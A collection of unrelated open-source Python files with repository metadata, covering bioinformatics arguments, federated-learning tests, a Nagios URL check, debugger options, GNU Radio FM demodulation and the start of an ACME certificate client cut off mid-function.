mapper.add_argument('--windows', dest='windows', default=None,
nargs='+',
help='''defines windows to be used to trim the input
FASTQ reads, for example an iterative mapping can be defined
as: "--windows 1:20 1:25 1:30 1:35 1:40 1:45 1:50". But
this parameter can also be used for fragment based mapping
if for example pair-end reads are both in the same FASTQ,
for example: "--windows 1:50" (if the length of the reads
is 100). Note: that the numbers are both inclusive.''')
descro.add_argument('--species', dest='species', metavar="STR",
type=str,
help='species name')
descro.add_argument('--descr', dest='description', metavar="LIST", nargs='+',
type=str,
                        help='''extra descriptive fields, each field separated by a
                        comma, and inside each, name and value separated by a colon:
--descr=cell:lymphoblast,flowcell:C68AEACXX,index:24nf''')
glopts.add_argument('--skip', dest='skip', action='store_true',
default=False,
help='[DEBUG] in case already mapped.')
glopts.add_argument('--keep_tmp', dest='keep_tmp', action='store_true',
default=False,
help='[DEBUG] keep temporary files.')
mapper.add_argument("-C", "--cpus", dest="cpus", type=int,
                        default=cpu_count(), help='''[%(default)s] Maximum
                        number of CPU cores available on the execution host.
                        If higher than 1, tasks with multi-threading
                        capabilities will be enabled (if 0, all available
                        cores will be used)''')
mapper.add_argument('--mapper', dest='mapper', metavar="STR",
type=str, default='gem',
help='[%(default)s] mapper used, options are gem, bowtie2 or hisat2')
mapper.add_argument('--mapper_binary', dest='mapper_binary', metavar="STR",
type=str, default=None,
help='[%(default)s] path to mapper binary')
mapper.add_argument('--mapper_param', dest="mapper_param", type=str, default=0,
nargs='+',
help='''any parameter that could be passed to the GEM, BOWTIE2 or HISAT2
mapper. e.g. if we want to set the proportion of
mismatches to 0.05 and the maximum indel length to 10,
(in GEM v2 it would be: -e 0.05 --max-big-indel-length 10),
here we could write: "--mapper_param e:0.05
max-big-indel-length:10". For BOWTIE2, GEM3 and HISAT2 you can
also pass directly the parameters enclosed between quotes like:
--mapper_param "-e 0.05 --alignment-local-min-score 15"
IMPORTANT: some options are incompatible with 3C-derived experiments.''')
|
3DGenomes/tadbit
|
_pytadbit/tools/tadbit_map.py
|
Python
|
gpl-3.0
| 26,222 | 0.00492 |
# Copyright 2022, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from absl.testing import parameterized
import tensorflow as tf
import tensorflow_federated as tff
from compressed_communication.aggregators.comparison_methods import one_bit_sgd
_test_integer_tensor_type = (tf.int32, (3,))
_test_float_struct_type = [(tf.float32, (2,)), (tf.float32, (3,))]
_test_float_tensor_type = (tf.float32, (3,))
class OneBitSGDComputationTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_one_bit_sgd_properties(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
self.assertIsInstance(process, tff.templates.AggregationProcess)
server_state_type = tff.type_at_server(())
expected_initialize_type = tff.FunctionType(
parameter=None, result=server_state_type)
self.assert_types_equivalent(process.initialize.type_signature,
expected_initialize_type)
expected_measurements_type = tff.type_at_server(
collections.OrderedDict(
avg_bitrate=tf.float32,
avg_distortion=tf.float32))
expected_next_type = tff.FunctionType(
parameter=collections.OrderedDict(
state=server_state_type, value=tff.type_at_clients(value_type)),
result=tff.templates.MeasuredProcessOutput(
state=server_state_type,
result=tff.type_at_server(value_type),
measurements=expected_measurements_type))
self.assert_types_equivalent(process.next.type_signature,
expected_next_type)
@parameterized.named_parameters(
("integer_tensor", _test_integer_tensor_type),
("float_struct", _test_float_struct_type))
def test_one_bit_sgd_create_raises(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
self.assertRaises(ValueError, factory.create, value_type)
class OneBitSGDExecutionTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * 2
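    # Expected bitrate below: presumably one bit per tensor element plus two
    # 32-bit float reconstruction values, i.e. tensor size + 64 bits in total.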
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [-1.0 * tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * -2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[0.0, 2.0, -1.0] for _ in range(2)]
expected_result = [2.0, 2.0, -2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_nonzero_threshold(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0] for _ in range(2)]
expected_result = [0.0, 0.0, 4.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_one_client(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0]]
expected_result = [0.0, 0.0, 2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_different_clients(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0], [1.0, 1.0, 1.0]]
expected_result = [1.0, 1.0, 3.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./6.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
if __name__ == "__main__":
tff.test.main()
|
google-research/federated
|
compressed_communication/aggregators/comparison_methods/one_bit_sgd_test.py
|
Python
|
apache-2.0
| 8,373 | 0.00203 |
#!/usr/bin/python
import sys
import requests
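# Example invocation (hypothetical host), e.g. as a Nagios/NRPE check:
#   ./check_url.py www.example.com
# Exits 0 on HTTP 200 (OK) and 2 otherwise (CRITICAL).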
try:
url = sys.argv[1]
r = requests.get('http://%s' %url ,timeout=3)
except requests.exceptions.Timeout:
print 'url timeout\n%s' %url
sys.exit(2)
except:
print 'url error \n%s' %url
sys.exit(2)
url_status = r.status_code
if url_status == 200:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(0)
else:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(2)
|
XiaJieCom/change
|
document/Service/nagios/nrpe/check_url.py
|
Python
|
lgpl-2.1
| 489 | 0.03272 |
# CTCI 1.3
# URLify
import unittest
# My Solution
#-------------------------------------------------------------------------------
# CTCI Solution
def urlify(string, length):
'''function replaces single spaces with %20 and removes trailing spaces'''
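    # The list is filled in place from the back: scanning the first `length`
    # characters in reverse, each character is shifted towards the end of the
    # buffer (so nothing is overwritten) and each space expands to '%20'. The
    # caller is expected to provide enough trailing spaces to hold the result.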
new_index = len(string)
for i in reversed(range(length)):
if string[i] == ' ':
# Replace spaces
string[new_index - 3:new_index] = '%20'
new_index -= 3
else:
# Move characters
string[new_index - 1] = string[i]
new_index -= 1
return string
#-------------------------------------------------------------------------------
#Testing
class Test(unittest.TestCase):
'''Test Cases'''
# Using lists because Python strings are immutable
    data = [
        (list('much ado about nothing      '), 22,
         list('much%20ado%20about%20nothing')),
        (list('Mr John Smith    '), 13, list('Mr%20John%20Smith'))]
def test_urlify(self):
for [test_string, length, expected] in self.data:
actual = urlify(test_string, length)
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
kyle8998/Practice-Coding-Questions
|
CTCI/Chapter1/1.3-URLify.py
|
Python
|
unlicense
| 1,208 | 0.005795 |
# System imports
import os
from os.path import join
import pytest
from git import *
from PyGitUp.git_wrapper import RebaseError
from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name
test_name = 'rebase_error'
repo_path = join(basepath, test_name + os.sep)
def setup():
master_path, master = init_master(test_name)
# Prepare master repo
master.git.checkout(b=test_name)
# Clone to test repo
path = join(basepath, test_name)
master.clone(path, b=test_name)
repo = Repo(path, odbt=GitCmdObjectDB)
assert repo.working_dir == path
# Modify file in master
update_file(master, test_name)
# Modify file in our repo
contents = 'completely changed!'
repo_file = join(path, testfile_name)
write_file(repo_file, contents)
repo.index.add([repo_file])
repo.index.commit(test_name)
# Modify file in master
update_file(master, test_name)
def test_rebase_error():
""" Run 'git up' with a failing rebase """
os.chdir(repo_path)
from PyGitUp.gitup import GitUp
gitup = GitUp(testing=True)
with pytest.raises(RebaseError):
gitup.run()
|
msiemens/PyGitUp
|
PyGitUp/tests/test_rebase_error.py
|
Python
|
mit
| 1,166 | 0.001715 |
#!/usr/bin/env python
#! -*- coding: utf-8 -*-
from gi.repository import Cld
from gi.repository import DcsCore as dc
from gi.repository import DcsUI as du
from gi.repository import Gtk
class DcsExample(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="DCS Example")
config = Cld.XmlConfig.with_file_name("examples/cld.xml")
self.context = Cld.Context.from_config(config)
self.chan = self.context.get_object("ai0")
self.dev = self.context.get_object("dev0")
self.dev.open()
if(not self.dev.is_open):
print "Open device " + self.dev.id + " failed"
#self.task = self.context.get_object("tk0")
#self.task.run()
self.aictl = du.AIControl("/ai0")
self.aictl.connect("request_object", self.offer)
self.add(self.aictl)
def offer(self, widget):
widget.offer_cld_object(self.chan)
win = DcsExample()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
|
open-dcs/dcs
|
examples/python/ui.py
|
Python
|
mit
| 1,007 | 0.004965 |
#!/usr/bin/python
import io
import os
import unittest
import logging
import uuid
from mediafire import MediaFireApi, MediaFireUploader, UploadSession
from mediafire.uploader import UPLOAD_SIMPLE_LIMIT_BYTES
APP_ID = '42511'
MEDIAFIRE_EMAIL = os.environ.get('MEDIAFIRE_EMAIL')
MEDIAFIRE_PASSWORD = os.environ.get('MEDIAFIRE_PASSWORD')
class MediaFireSmokeBaseTestCase(object):
"""Smoke tests for API"""
class BaseTest(unittest.TestCase):
def setUp(self):
# Reset logging to info to avoid leaking credentials
logger = logging.getLogger('mediafire.api')
logger.setLevel(logging.INFO)
self.api = MediaFireApi()
session = self.api.user_get_session_token(
app_id=APP_ID, email=MEDIAFIRE_EMAIL,
password=MEDIAFIRE_PASSWORD)
self.api.session = session
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeSimpleTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Simple tests"""
def test_user_get_info(self):
result = self.api.user_get_info()
self.assertEqual(result["user_info"]["display_name"],
u"Coalmine Smoketest")
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeWithDirectoryTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Smoke tests requiring temporary directory"""
def setUp(self):
super(MediaFireSmokeWithDirectoryTest, self).setUp()
folder_uuid = str(uuid.uuid4())
result = self.api.folder_create(foldername=folder_uuid)
self.folder_key = result["folder_key"]
def tearDown(self):
self.api.folder_purge(self.folder_key)
def test_upload_small(self):
"""Test simple upload"""
# make sure we most likely will get upload/simple
data = b'This is a tiny file content: ' + os.urandom(32)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'smallfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/simple')
def test_upload_large(self):
"""Test large file upload"""
# make sure we will get upload/resumable, prefix + 4MiB
data = b'Long line is long: ' + os.urandom(UPLOAD_SIMPLE_LIMIT_BYTES)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'bigfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/resumable')
if __name__ == "__main__":
unittest.main()
|
MediaFire/mediafire-python-open-sdk
|
tests/test_smoke.py
|
Python
|
bsd-2-clause
| 2,879 | 0.000347 |
from __future__ import print_function
from __future__ import absolute_import
# System modules
import argparse
import sys
import multiprocessing
import os
import textwrap
# Third-party modules
# LLDB modules
from . import configuration
class ArgParseNamespace(object):
pass
def parse_args(parser, argv):
""" Returns an argument object. LLDB_TEST_ARGUMENTS environment variable can
be used to pass additional arguments.
"""
args = ArgParseNamespace()
if ('LLDB_TEST_ARGUMENTS' in os.environ):
print(
"Arguments passed through environment: '%s'" %
os.environ['LLDB_TEST_ARGUMENTS'])
args = parser.parse_args([sys.argv[0]].__add__(
os.environ['LLDB_TEST_ARGUMENTS'].split()), namespace=args)
return parser.parse_args(args=argv, namespace=args)
def default_thread_count():
# Check if specified in the environment
num_threads_str = os.environ.get("LLDB_TEST_THREADS")
if num_threads_str:
return int(num_threads_str)
else:
return multiprocessing.cpu_count()
def create_parser():
parser = argparse.ArgumentParser(
description='description',
prefix_chars='+-',
add_help=False)
group = None
# Helper function for boolean options (group will point to the current
# group when executing X)
X = lambda optstr, helpstr, **kwargs: group.add_argument(
optstr, help=helpstr, action='store_true', **kwargs)
group = parser.add_argument_group('Help')
group.add_argument(
'-h',
'--help',
dest='h',
action='store_true',
help="Print this help message and exit. Add '-v' for more detailed help.")
# C and Python toolchain options
group = parser.add_argument_group('Toolchain options')
group.add_argument(
'-A',
'--arch',
metavar='arch',
dest='arch',
help=textwrap.dedent('''Specify the architecture(s) to test. This option can be specified more than once'''))
group.add_argument('-C', '--compiler', metavar='compiler', dest='compiler', help=textwrap.dedent(
'''Specify the compiler(s) used to build the inferior executables. The compiler path can be an executable basename or a full path to a compiler executable. This option can be specified multiple times.'''))
if sys.platform == 'darwin':
group.add_argument('--apple-sdk', metavar='apple_sdk', dest='apple_sdk', default="macosx", help=textwrap.dedent(
'''Specify the name of the Apple SDK (macosx, macosx.internal, iphoneos, iphoneos.internal, or path to SDK) and use the appropriate tools from that SDK's toolchain.'''))
# FIXME? This won't work for different extra flags according to each arch.
group.add_argument(
'-E',
metavar='extra-flags',
help=textwrap.dedent('''Specify the extra flags to be passed to the toolchain when building the inferior programs to be debugged
suggestions: do not lump the "-A arch1 -A arch2" together such that the -E option applies to only one of the architectures'''))
group.add_argument('--dsymutil', metavar='dsymutil', dest='dsymutil', help=textwrap.dedent('Specify which dsymutil to use.'))
# Test filtering options
group = parser.add_argument_group('Test filtering options')
group.add_argument(
'-f',
metavar='filterspec',
action='append',
help='Specify a filter, which consists of the test class name, a dot, followed by the test method, to only admit such test into the test suite') # FIXME: Example?
X('-l', "Don't skip long running tests")
group.add_argument(
'-p',
metavar='pattern',
help='Specify a regexp filename pattern for inclusion in the test suite')
group.add_argument('--excluded', metavar='exclusion-file', action='append', help=textwrap.dedent(
'''Specify a file for tests to exclude. File should contain lists of regular expressions for test files or methods,
with each list under a matching header (xfail files, xfail methods, skip files, skip methods)'''))
group.add_argument(
'-G',
'--category',
metavar='category',
action='append',
dest='categoriesList',
help=textwrap.dedent('''Specify categories of test cases of interest. Can be specified more than once.'''))
group.add_argument(
'--skip-category',
metavar='category',
action='append',
dest='skipCategories',
help=textwrap.dedent('''Specify categories of test cases to skip. Takes precedence over -G. Can be specified more than once.'''))
# Configuration options
group = parser.add_argument_group('Configuration options')
group.add_argument(
'--framework',
metavar='framework-path',
help='The path to LLDB.framework')
group.add_argument(
'--executable',
metavar='executable-path',
help='The path to the lldb executable')
group.add_argument(
'--server',
metavar='server-path',
help='The path to the debug server executable to use')
group.add_argument(
'--out-of-tree-debugserver',
dest='out_of_tree_debugserver',
action='store_true',
help='A flag to indicate an out-of-tree debug server is being used')
group.add_argument(
'-s',
metavar='name',
help='Specify the name of the dir created to store the session files of tests with errored or failed status. If not specified, the test driver uses the timestamp as the session dir name')
group.add_argument(
'-S',
'--session-file-format',
default=configuration.session_file_format,
metavar='format',
help='Specify session file name format. See configuration.py for a description.')
group.add_argument(
'-y',
type=int,
metavar='count',
help="Specify the iteration count used to collect our benchmarks. An example is the number of times to do 'thread step-over' to measure stepping speed.")
group.add_argument(
'-#',
type=int,
metavar='sharp',
dest='sharp',
help='Repeat the test suite for a specified number of times')
group.add_argument('--channel', metavar='channel', dest='channels', action='append', help=textwrap.dedent(
"Specify the log channels (and optional categories) e.g. 'lldb all' or 'gdb-remote packets' if no categories are specified, 'default' is used"))
group.add_argument(
'--log-success',
dest='log_success',
action='store_true',
help="Leave logs/traces even for successful test runs (useful for creating reference log files during debugging.)")
group.add_argument(
'--codesign-identity',
metavar='Codesigning identity',
default='lldb_codesign',
help='The codesigning identity to use')
group.add_argument(
'--build-dir',
dest='test_build_dir',
metavar='Test build directory',
default='lldb-test-build.noindex',
help='The root build directory for the tests. It will be removed before running.')
# Configuration options
group = parser.add_argument_group('Remote platform options')
group.add_argument(
'--platform-name',
dest='lldb_platform_name',
metavar='platform-name',
help='The name of a remote platform to use')
group.add_argument(
'--platform-url',
dest='lldb_platform_url',
metavar='platform-url',
help='A LLDB platform URL to use when connecting to a remote platform to run the test suite')
group.add_argument(
'--platform-working-dir',
dest='lldb_platform_working_dir',
metavar='platform-working-dir',
help='The directory to use on the remote platform.')
# Test-suite behaviour
group = parser.add_argument_group('Runtime behaviour options')
X('-d', 'Suspend the process after launch to wait indefinitely for a debugger to attach')
X('-q', "Don't print extra output from this script.")
X('-t', 'Turn on tracing of lldb command and other detailed test executions')
group.add_argument(
'-u',
dest='unset_env_varnames',
metavar='variable',
action='append',
help='Specify an environment variable to unset before running the test cases. e.g., -u DYLD_INSERT_LIBRARIES -u MallocScribble')
group.add_argument(
'--env',
dest='set_env_vars',
metavar='variable',
action='append',
help='Specify an environment variable to set to the given value before running the test cases e.g.: --env CXXFLAGS=-O3 --env DYLD_INSERT_LIBRARIES')
X('-v', 'Do verbose mode of unittest framework (print out each test case invocation)')
group.add_argument(
'--enable-crash-dialog',
dest='disable_crash_dialog',
action='store_false',
help='(Windows only) When LLDB crashes, display the Windows crash dialog.')
group.set_defaults(disable_crash_dialog=True)
group = parser.add_argument_group('Parallel execution options')
group.add_argument(
'--inferior',
action='store_true',
help=('specify this invocation is a multiprocess inferior, '
'used internally'))
group.add_argument(
'--no-multiprocess',
action='store_true',
help='skip running the multiprocess test runner')
group.add_argument(
'--threads',
type=int,
dest='num_threads',
default=default_thread_count(),
help=('The number of threads/processes to use when running tests '
'separately, defaults to the number of CPU cores available'))
group.add_argument(
'--test-subdir',
action='store',
help='Specify a test subdirectory to use relative to the test root dir'
)
group.add_argument(
'--test-runner-name',
action='store',
help=('Specify a test runner strategy. Valid values: multiprocessing,'
' multiprocessing-pool, serial, threading, threading-pool')
)
# Test results support.
group = parser.add_argument_group('Test results options')
group.add_argument(
'--curses',
action='store_true',
help='Shortcut for specifying test results using the curses formatter')
group.add_argument(
'--results-file',
action='store',
help=('Specifies the file where test results will be written '
'according to the results-formatter class used'))
group.add_argument(
'--results-port',
action='store',
type=int,
help=('Specifies the localhost port to which the results '
'formatted output should be sent'))
group.add_argument(
'--results-formatter',
action='store',
help=('Specifies the full package/module/class name used to translate '
'test events into some kind of meaningful report, written to '
'the designated output results file-like object'))
group.add_argument(
'--results-formatter-option',
'-O',
action='append',
dest='results_formatter_options',
help=('Specify an option to pass to the formatter. '
'Use --results-formatter-option="--option1=val1" '
'syntax. Note the "=" is critical, don\'t include whitespace.'))
group.add_argument(
'--event-add-entries',
action='store',
help=('Specify comma-separated KEY=VAL entries to add key and value '
'pairs to all test events generated by this test run. VAL may '
'be specified as VAL:TYPE, where TYPE may be int to convert '
'the value to an int'))
# Re-run related arguments
group = parser.add_argument_group('Test Re-run Options')
group.add_argument(
'--rerun-all-issues',
action='store_true',
help=('Re-run all issues that occurred during the test run '
'irrespective of the test method\'s marking as flakey. '
'Default behavior is to apply re-runs only to flakey '
'tests that generate issues.'))
group.add_argument(
'--rerun-max-file-threshold',
action='store',
type=int,
default=50,
help=('Maximum number of files requiring a rerun beyond '
'which the rerun will not occur. This is meant to '
'stop a catastrophically failing test suite from forcing '
'all tests to be rerun in the single-worker phase.'))
# Remove the reference to our helper function
del X
group = parser.add_argument_group('Test directories')
group.add_argument(
'args',
metavar='test-dir',
nargs='*',
help='Specify a list of directory names to search for test modules named after Test*.py (test discovery). If empty, search from the current working directory instead.')
return parser
|
youtube/cobalt
|
third_party/llvm-project/lldb/packages/Python/lldbsuite/test/dotest_args.py
|
Python
|
bsd-3-clause
| 13,110 | 0.002517 |
#!/usr/bin/env python
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import audio
from gnuradio.filter import firdes
from gnuradio.fft import window
import sys, math
# Create a top_block
class build_graph(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
input_rate = 200e3 # rate of a broadcast FM station
audio_rate = 44.1e3 # Rate we send the signal to the speaker
# resample from the output of the demodulator to the rate of
# the audio sink.
resamp_rate = audio_rate / input_rate
# use a file as a dummy source. Replace this with a real radio
# receiver to capture signals over-the-air.
src = blocks.file_source(gr.sizeof_gr_complex, "dummy.dat", True)
# Set the demodulator using the same deviation as the receiver.
max_dev = 75e3
fm_demod_gain = input_rate / (2*math.pi*max_dev/8.0)
fm_demod = analog.quadrature_demod_cf(fm_demod_gain)
# Create a filter for the resampler and filter the audio
# signal to 15 kHz. The nfilts is the number of filters in the
# arbitrary resampler. It logically operates at a rate of
# nfilts*input_rate, so we make those adjustments when
# building the filter.
volume = 0.20
nfilts = 32
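        # For reference: with these defaults the prototype filter is designed at
        # nfilts * input_rate = 32 * 200 kHz = 6.4 MHz, with a passband gain of
        # volume * nfilts = 0.2 * 32 = 6.4 to compensate for splitting the taps
        # across the 32 polyphase arms of the resampler.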
resamp_taps = firdes.low_pass_2(volume*nfilts, # gain
nfilts*input_rate, # sampling rate
15e3, # low pass cutoff freq
1e3, # width of trans. band
60, # stop band attenuaton
window.WIN_KAISER)
# Build the resampler and filter
resamp_filter = filter.pfb_arb_resampler_fff(resamp_rate,
resamp_taps, nfilts)
# sound card as final sink You may have to add a specific
# device name as a second argument here, something like
# "pulse" if using pulse audio or "plughw:0,0".
audio_sink = audio.sink(int(audio_rate))
# now wire it all together
self.connect(src, fm_demod)
self.connect(fm_demod, resamp_filter)
self.connect(resamp_filter, (audio_sink,0))
def main(args):
tb = build_graph()
tb.start() # fork thread and return
input('Press Enter to quit: ')
tb.stop()
if __name__ == '__main__':
main(sys.argv[1:])
|
mbr0wn/gnuradio
|
gr-analog/examples/fm_demod.py
|
Python
|
gpl-3.0
| 2,750 | 0.003273 |
from atlas_web import app
app.run(debug=True)
|
RDCEP/atlas-viewer
|
run.py
|
Python
|
apache-2.0
| 45 | 0.022222 |
#!/usr/bin/env python
import argparse, subprocess, json, os, sys, base64, binascii, time, hashlib, re, copy, textwrap, logging
try:
from urllib.request import urlopen # Python 3
except ImportError:
from urllib2 import urlopen # Python 2
#DEFAULT_CA = "https://acme-staging.api.letsencrypt.org"
DEFAULT_CA = "https://acme-v01.api.letsencrypt.org"
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.StreamHandler())
LOGGER.setLevel(logging.INFO)
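# The account key and CSR passed on the command line are ordinary OpenSSL
# artifacts; one common way to create them (paths illustrative) is:
#   openssl genrsa 4096 > account.key
#   openssl req -new -sha256 -key domain.key -subj "/CN=example.com" > domain.csr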
def get_crt(account_key, csr, acme_dir, log=LOGGER, CA=DEFAULT_CA):
# helper function base64 encode for jose spec
def _b64(b):
return base64.urlsafe_b64encode(b).decode('utf8').replace("=", "")
# parse account key to get public key
log.info("Parsing account key...")
proc = subprocess.Popen(["openssl", "rsa", "-in", account_key, "-noout", "-text"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
pub_hex, pub_exp = re.search(
r"modulus:\n\s+00:([a-f0-9\:\s]+?)\npublicExponent: ([0-9]+)",
out.decode('utf8'), re.MULTILINE|re.DOTALL).groups()
pub_exp = "{0:x}".format(int(pub_exp))
pub_exp = "0{0}".format(pub_exp) if len(pub_exp) % 2 else pub_exp
header = {
"alg": "RS256",
"jwk": {
"e": _b64(binascii.unhexlify(pub_exp)),
"kty": "RSA",
"n": _b64(binascii.unhexlify(re.sub(r"(\s|:)", "", pub_hex))),
},
}
accountkey_json = json.dumps(header['jwk'], sort_keys=True, separators=(',', ':'))
thumbprint = _b64(hashlib.sha256(accountkey_json.encode('utf8')).digest())
# helper function make signed requests
def _send_signed_request(url, payload):
payload64 = _b64(json.dumps(payload).encode('utf8'))
protected = copy.deepcopy(header)
protected["nonce"] = urlopen(CA + "/directory").headers['Replay-Nonce']
protected64 = _b64(json.dumps(protected).encode('utf8'))
proc = subprocess.Popen(["openssl", "dgst", "-sha256", "-sign", account_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate("{0}.{1}".format(protected64, payload64).encode('utf8'))
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
data = json.dumps({
"header": header, "protected": protected64,
"payload": payload64, "signature": _b64(out),
})
try:
resp = urlopen(url, data.encode('utf8'))
return resp.getcode(), resp.read()
except IOError as e:
return e.code, e.read()
# find domains
log.info("Parsing CSR...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-noout", "-text"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("Error loading {0}: {1}".format(csr, err))
domains = set([])
common_name = re.search(r"Subject:.*? CN=([^\s,;/]+)", out.decode('utf8'))
if common_name is not None:
domains.add(common_name.group(1))
subject_alt_names = re.search(r"X509v3 Subject Alternative Name: \n +([^\n]+)\n", out.decode('utf8'), re.MULTILINE|re.DOTALL)
if subject_alt_names is not None:
for san in subject_alt_names.group(1).split(", "):
if san.startswith("DNS:"):
domains.add(san[4:])
    # register the account with the CA
log.info("Registering account...")
code, result = _send_signed_request(CA + "/acme/new-reg", {
"resource": "new-reg",
"agreement": "https://letsencrypt.org/documents/LE-SA-v1.0.1-July-27-2015.pdf",
})
if code == 201:
log.info("Registered!")
elif code == 409:
log.info("Already registered!")
else:
raise ValueError("Error registering: {0} {1}".format(code, result))
# verify each domain
for domain in domains:
log.info("Verifying {0}...".format(domain))
# get new challenge
code, result = _send_signed_request(CA + "/acme/new-authz", {
"resource": "new-authz",
"identifier": {"type": "dns", "value": domain},
})
if code != 201:
raise ValueError("Error requesting challenges: {0} {1}".format(code, result))
# make the challenge file
challenge = [c for c in json.loads(result.decode('utf8'))['challenges'] if c['type'] == "http-01"][0]
token = re.sub(r"[^A-Za-z0-9_\-]", "_", challenge['token'])
keyauthorization = "{0}.{1}".format(token, thumbprint)
wellknown_path = os.path.join(acme_dir, token)
with open(wellknown_path, "w") as wellknown_file:
wellknown_file.write(keyauthorization)
# check that the file is in place
wellknown_url = "http://{0}/.well-known/acme-challenge/{1}".format(domain, token)
try:
resp = urlopen(wellknown_url)
